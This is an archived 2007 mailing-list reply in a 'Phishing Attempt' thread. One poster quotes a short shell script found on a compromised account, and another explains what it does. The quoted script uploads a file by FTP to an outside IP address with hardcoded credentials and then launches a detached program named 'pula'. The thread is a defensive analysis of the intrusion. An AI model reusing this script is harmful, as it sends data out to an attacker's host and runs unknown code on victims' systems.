Re: Phishing Attempt
- From: Peter Pearson <ppearson@xxxxxxxxxxxxxxx>
- Date: Tue, 02 Oct 2007 15:06:37 -0000
On Tue, 02 Oct 2007 23:19:17 +1000, Mark wrote:
Mark wrote:
OK below is the text of the script as it was sent back to me. I can
The account home directory contained a simple shell script of just over
a dozen lines I can't see what it's doing there.
normally understand shell scripts, but I can't see what this one is doing.
=20
#!/bin/sh
HOST=3D'58.105.225.59'
USER=3D'test'
PASSWD=3D'testing'
FILE=3D'1.db'
=20
ftp -n $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASSWD
put $FILE
quit
END_SCRIPT
sleep 70
./pula &
exit 0
=20
=20
The "=3D" looks like an escape convention for representing
the character "=". Under that convention, "=20" is a space.
I don't know who processes the "quote" command, but from the
context it's prety clear that its function is to substitute
values for the variables $USER and $PASSWD.
So, what it does:
1. FTP to 58.105.225.59 with user name "test" and password
"testing", and send the file "1.db". (With this name
and password, I get "Login incorrect.")
2. Sleep for 70 seconds.
3. Run the program "pula", detached.
--
To email me, substitute nowhere->spamcop, invalid->net.
.
- References:
- Phishing Attempt
- From: Mark
- Re: Phishing Attempt
- From: Mark
- Phishing Attempt
- Prev by Date: Re: Phishing Attempt
- Next by Date: Re: User access & security
- Previous by thread: Re: Phishing Attempt
- Next by thread: Re: Phishing Attempt
- Index(es):
Relevant Pages
|
